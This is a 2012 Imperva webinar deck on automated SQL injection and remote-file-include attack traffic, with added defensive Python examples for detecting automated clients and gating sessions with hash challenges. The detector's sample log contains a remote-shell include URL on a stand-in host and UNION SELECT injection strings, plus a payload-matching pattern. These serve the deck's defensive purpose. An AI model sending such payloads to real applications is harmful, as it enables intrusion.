Automated Hacking Tools: The New Rock Stars in the Cyber Underground
© 2012 Imperva, Inc. All rights reserved.
Agenda
+ Context for HII Reports
+ Introducing Automated Hacking
  – Quantifying Automation
  – Hacking Automation Use Cases
  – Sample Tools
+ Analyzing Real World Data
+ Detection and Mitigation
+ Questions and Answers
Presenter: Amichai Shulman – CTO Imperva
+ Speaker at industry events
  – RSA, Sybase Techwave, Info Security UK, Black Hat
+ Lecturer on information security
  – Technion - Israel Institute of Technology
+ Former security consultant to banks and financial services firms
+ Leads the Application Defense Center (ADC)
  – Discovered over 20 commercial application vulnerabilities
  – Credited by Oracle, MS-SQL, IBM and others
+ One of InfoWorld's "Top 25 CTOs"
HII Report Context
+ The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice
  – A different approach from vulnerability research
+ Data set composition
  – ~50 real world applications
  – Anonymous proxies
+ More than 18 months of data
+ Powerful analysis system
  – Combines analytic tools with drill-down capabilities
Introducing Automated Hacking
Quantifying Automation
[Chart: share of attack traffic generated by automated tools vs. manually]
+ RFI: Automatic 98%, Manual 2%
+ SQLi: Automatic 88%, Manual 12%
Hacking Automation Use Cases
+ Automation affects the magnitude of the threat posed by hacking
+ Honeypot.org: The Social Dynamics of Hacking
Hacking Automation Use Cases
+ Skilled hackers
  – Create more powerful tools
  – Focus not only on finding vulnerabilities but also on robust automation of their exploit (an engineering challenge)
+ Professional (semi-skilled) hackers
  – Can grow their business faster and more effectively using automation
  – Puts more organizations at risk as potential targets
+ Unskilled hackers
  – Increased potential for incidental damage
Hacking Automation Use Cases
+ Botnets
  – A step further in the evolution of automated hacking
  – Rather than automating a task, it is automation of the entire operation
+ Includes all steps of the operation
  – Target selection
  – Probing
  – Exploit
Automated Hacking Tools
+ Search engine hacking
  – Discovery phase
  – Mostly botnet based today
+ General scanners
  – Probing of chosen targets
+ Focused on attack type
+ Focused on individual vulnerability
  – Exist as standalone tools and botnet modules
Automated Hacking Tools
+ High-end
  – Slick GUI (point and click)
  – Evasion techniques
  – State-of-the-art attack vectors
+ Havij
  – Focused on SQL injection attacks
  – Used in attacks by LulzSec and Anonymous
Automated Hacking Tools
+ Professional
  – Command line
  – Ready for instrumentation
+ sqlmap
  – Focused on SQL injection
+ fimap
  – Focused on Remote File Include
Automated Hacking Tools
WhiteHat flipping sides + Tools aimed at
vulnerability scanning + Automation is essential for
continuous testing of large and complex web applications
+ Inherently easier to operate
Nikto + Public domain,
low end Nessus
+ Public domain (some versions), very friendly GUI
Acunetix + Powerful
commercial tool, stolen licenses are shared among hackers
16
© 2012 Imperva, Inc. All rights reserved.
Analyzing Real World Data
Type of Automation
+ The type of automation is tightly related to the nature of the vulnerability being exploited
+ SQL Injection
  – Tools that focus on an individual application at a time
  – High volume, high rate traffic generated against a single application
+ RFI
  – Tools that try to cover as many applications as possible
  – Low volume traffic when watching a single application
+ Search Engine Hacking
  – Need to bypass search engine restrictions
  – Highly distributed botnets
Type of Automation
+ RFI attacks: many sources attack more than one target
Persistence of Sources
+ A fair number of attack sources are persistent over time
  – Persistent source = more than 3 days of activity
  – 30% of SQLi attacks
  – 60% of RFI attacks
[Chart: SQLi attacks (log scale) vs. activity days of the source]
Persistence of Sources
+ RFI attacks: many consistent attackers
Persistence of Attack Vectors
+ RFI attacks: collect the URLs that host the infection script
+ Some URLs are used consistently over time
Persistence of Attack Vectors
+ Many shell URLs are used against more than one target
Country of Origin

SQLi – all attack sources
Country              Hosts   % of Hosts
USA                   3994        80
China                  355         7
United Kingdom          75         2
Russian Federation      49         1
Canada                  40         1
Republic of Korea       33         1
Germany                 31         1
Brazil                  29         1
India                   28         1
France                  24         1

SQLi – high-rate automation sources
Country              Hosts   % of Hosts
China                   98        30
USA                     78        24
Netherlands              9         3
Morocco                  8         2
Egypt                    7         2
Luxembourg               7         2
Brazil                   7         2
France                   7         2
Indonesia                6         2
Russian Federation       6         2

+ Most attack sources are in the US
+ Most high-rate automation sources are in China!
Detection and Mitigation
General
+ Motivation
  – Automated hacking accounts for a large portion of attack traffic
  – Being able to detect malicious automation dramatically reduces the stress on other mechanisms designed to detect specific attacks
+ Challenge
  – Hard to implement WITHIN applications, as automation can be applied against each and every part of the application or the underlying application server
Detecting Automated Hacking - Passive
+ Passive methods
  – Watch network traffic "as-is"
  – Non-intrusive, do not affect user experience
+ Traffic shape indicators
  – We measure suspicious requests (rather than ALL requests)
  – Measured attributes: rate, rate change (ramp-up speed), volume
  – Difficult to measure in an inherently noisy source (NAT)
+ Request shape indicators
  – Missing headers
  – Mismatch between headers and location
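The passive indicators above, worked through as an added example (this is not Imperva's detection code and not part of the original deck): a few constructed access-log records are scored by traffic shape (volume, sustained rate and ramp-up of suspicious requests only) and by request shape (browser headers missing, Host/Referer not matching the application). The log format, the header set, the SQLi/RFI markers and all thresholds are assumptions chosen for illustration.

```python
"""Passive automation indicators over constructed access-log records.

Added example for this section; it is not Imperva's detection code.  It
implements the two passive indicator families named on the slide:
  * traffic shape  - rate, ramp-up and volume of *suspicious* requests per source
  * request shape  - missing browser headers, header/location mismatch
The log format, header set, SQLi/RFI markers and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

APP_HOST = "app.example.test"                                          # assumed hostname of the protected app
SUSPICIOUS = re.compile(r"(union[\s+]+select|'|--|https?://)", re.I)   # coarse SQLi / RFI markers (assumption)
BROWSER_HEADERS = ("User-Agent", "Accept", "Accept-Language")         # real browsers always send these

# Constructed records, not real traffic: (timestamp, source ip, request path, headers)
SAMPLE_LOG = [
    ("2012-07-01T10:00:00", "203.0.113.7", "/index.php?id=5",         # ordinary browsing user
     {"Host": APP_HOST, "User-Agent": "Mozilla/5.0", "Accept": "text/html",
      "Accept-Language": "en-US", "Referer": "http://app.example.test/"}),
    ("2012-07-01T10:05:00", "192.0.2.33",                              # one RFI probe, bare headers
     "/include.php?page=http://evil.example.test/shell.txt", {"Host": APP_HOST}),
] + [
    (f"2012-07-01T10:00:{i:02d}", "198.51.100.9",                      # SQLi tool hammering one page
     f"/index.php?id=5'+UNION+SELECT+{i}--",
     {"Host": APP_HOST, "User-Agent": "Mozilla/4.0", "Accept": "*/*",
      "Referer": "http://other.example.test/"})
    for i in range(40)
]


def is_suspicious(path):
    """Only suspicious requests are metered, as the slide says, not ALL requests."""
    return bool(SUSPICIOUS.search(path))


def request_shape_flags(headers):
    """Request-shape indicators: headers a browser would send but a script omits,
    and a Host/Referer that does not match where the request landed."""
    flags = [f"missing:{h}" for h in BROWSER_HEADERS if h not in headers]
    host = headers.get("Host", APP_HOST)
    if host != APP_HOST:
        flags.append("host-mismatch")
    referer = headers.get("Referer")
    if referer and urlsplit(referer).hostname != host:
        flags.append("referer-mismatch")
    return flags


def traffic_shape(log, window=timedelta(seconds=10)):
    """Per source: volume, sustained rate and ramp-up (suspicious requests in the first window)."""
    times = defaultdict(list)
    for ts, src, path, _ in log:
        if is_suspicious(path):
            times[src].append(datetime.fromisoformat(ts))
    shape = {}
    for src, seen in times.items():
        seen.sort()
        span = max((seen[-1] - seen[0]).total_seconds(), window.total_seconds())
        shape[src] = {
            "volume": len(seen),
            "rate_per_s": round(len(seen) / span, 2),
            "ramp_up": sum(1 for t in seen if t - seen[0] < window),
        }
    return shape


def classify(log, min_volume=20, min_rate=0.5, min_ramp=5):
    """A source is flagged as automated by traffic shape (all three thresholds met) or by
    request shape (a browser header is missing).  Thresholds are assumptions; behind a
    NAT the traffic-shape thresholds must be raised, which is the noise the slide warns about."""
    shape, flags = traffic_shape(log), defaultdict(set)
    for _, src, _, headers in log:
        flags[src].update(request_shape_flags(headers))
    verdict = {}
    for src in {rec[1] for rec in log}:
        ts = shape.get(src, {"volume": 0, "rate_per_s": 0.0, "ramp_up": 0})
        by_traffic = ts["volume"] >= min_volume and ts["rate_per_s"] >= min_rate and ts["ramp_up"] >= min_ramp
        by_request = any(f.startswith("missing:") for f in flags[src])
        verdict[src] = {"automated": by_traffic or by_request, "flags": sorted(flags[src]), **ts}
    return verdict


if __name__ == "__main__":
    for src, v in sorted(classify(SAMPLE_LOG).items()):
        print(src, v)
```

The SQLi tool is caught by traffic shape alone (40 suspicious requests in 39 seconds, 10 of them in the first 10 seconds) even though it sends a browser-like User-Agent; the single RFI probe never trips the rate thresholds and is caught only by request shape. Behind a NAT many users share one source address, so a rate-only rule must be tuned up or it will flag the NAT; that is why both families are combined.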
Detecting Automated Hacking - Active
+ Introduce changes into the server response
  – Test the client's reaction to the changes
  – May affect user experience – use with care
  – Verifies the type of user agent
+ Browsers support JavaScript and an appropriate DOM
  – Client is expected to complete some computation
  – Application / GW can validate the computed value
+ Browsers comply with HTML tags (IMG, IFRAME)
  – Client is expected to access the resource referenced by embedded tags
  – Failure to access the resource implies that the client is an automated script
Mitigation - Wisdom of the Crowds
+ Detected automation feeds into building fingerprints of tools and reputation data for sources
+ Leveraged when data is collected within a community
  – Recent regulatory changes endorse the concept of community
+ Drop requests matching fingerprints or coming from ill-reputed sources
Mitigation – Challenges and Metering
+ Introduce changes to the response that require a true browser user-agent before letting any further requests through within a session
  – Application / GW keeps sending the test for any request not in a validated session
  – A session is validated only if the user-agent responds properly
+ Introduce changes to the response that (building on the previous enforcement) introduce client-side latency
  – Challenge the client to solve a mathematical riddle
  – Partial hash collisions are a good example
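The session gating above and the active checks from the previous "Active" slide, as one added example (not Imperva's product code and not part of the original deck): a gateway keeps re-sending a challenge until the session is validated, the challenge is the computation a browser would run in JavaScript, and that computation is a partial hash collision whose difficulty meters the client's cost. An embedded IMG beacon is tracked as the second active check. The challenge format, the beacon path, the HMAC key and the difficulty are assumptions.

```python
"""Active check plus challenge/metering at a gateway: a session is validated
only after the client proves it ran the computation a browser would run in
JavaScript, and the computation is a partial hash collision whose difficulty
meters the client's cost.  Added example; not Imperva's product code.  The
challenge format, the beacon path, the HMAC key and the difficulty are assumptions.
"""
import hashlib
import hmac
import secrets

GATEWAY_KEY = b"assumed-gateway-secret"   # assumed key so challenges need no server-side state


def leading_zero_bits(digest):
    """Number of leading zero bits in a digest (the 'partial collision' with zero)."""
    return len(digest) * 8 - int.from_bytes(digest, "big").bit_length()


class Gateway:
    def __init__(self, difficulty_bits=12):
        self.difficulty_bits = difficulty_bits   # raise it to add latency for suspicious sources
        self.validated = set()                   # sessions that answered a challenge correctly
        self.beacon_seen = set()                 # sessions that fetched the embedded IMG resource

    def issue_challenge(self, session_id):
        nonce = secrets.token_hex(8)
        tag = hmac.new(GATEWAY_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()[:16]
        return {"nonce": nonce, "tag": tag, "bits": self.difficulty_bits,
                "beacon": f"/__beacon/{session_id}"}     # <img src=...> a real browser will fetch

    def verify(self, session_id, answer):
        # 1. the nonce must be one this gateway issued to this session (stateless via HMAC)
        expected = hmac.new(GATEWAY_KEY, f"{session_id}:{answer['nonce']}".encode(),
                            hashlib.sha256).hexdigest()[:16]
        if not hmac.compare_digest(expected, answer["tag"]):
            return False
        # 2. sha256(nonce:counter) must start with difficulty_bits zero bits
        digest = hashlib.sha256(f"{answer['nonce']}:{answer['counter']}".encode()).digest()
        return leading_zero_bits(digest) >= self.difficulty_bits

    def handle(self, session_id, path="/", answer=None):
        """Returns ('pass', body) for validated sessions, ('challenge', challenge) otherwise.
        The challenge is re-sent for every request until the session is validated."""
        if path.startswith("/__beacon/"):
            self.beacon_seen.add(session_id)
            return "pass", "1x1 gif"
        if session_id not in self.validated and answer is not None and self.verify(session_id, answer):
            self.validated.add(session_id)
        if session_id in self.validated:
            return "pass", "application response"
        return "challenge", self.issue_challenge(session_id)


def solve(challenge):
    """The work a browser does in the served JavaScript: brute-force a counter."""
    counter = 0
    while True:
        digest = hashlib.sha256(f"{challenge['nonce']}:{counter}".encode()).digest()
        if leading_zero_bits(digest) >= challenge["bits"]:
            return {"nonce": challenge["nonce"], "tag": challenge["tag"], "counter": counter}
        counter += 1


if __name__ == "__main__":
    gw = Gateway()
    kind, challenge = gw.handle("browser-1")                  # first request: challenged
    gw.handle("browser-1", path=challenge["beacon"])          # browser fetches the IMG beacon
    print(gw.handle("browser-1", answer=solve(challenge)))    # ('pass', 'application response')
    print(gw.handle("script-1"))                              # a script ignoring the JS is challenged again
    print(gw.handle("script-1")[0], "script-1" in gw.beacon_seen)
```

Binding the nonce to the session with an HMAC means a solved challenge cannot be replayed for another session and the gateway holds no per-challenge state; the expected work is 2^bits hashes, so raising the difficulty for sources the passive indicators flagged adds latency to their requests while a normal user pays it once per session.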
Mitigation (cont.)
+ Introduce CAPTCHA or another test to tell a human operator apart from a script
Summary
+ Automation is ruling the threat landscape
  – It accounts for the lion's share of attack traffic
+ Automation is used in various forms
  – In-depth scanning / attack of a single target
  – Wide-breadth scanning / attack of multiple applications
  – Distributed scanning / attack of single / multiple applications
Summary (cont.)
+ Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks
+ Detection and mitigation are most effectively deployed outside of the application
+ Detection and mitigation must include a combination of passive and active measures
+ Detection and mitigation are best utilized within a community that can generate reputation data
Webinar Materials
+ Join our LinkedIn group, Imperva Data Security Direct, for post-webinar discussions, answers to attendee questions, the webinar recording link and the webinar slides
+ www.imperva.com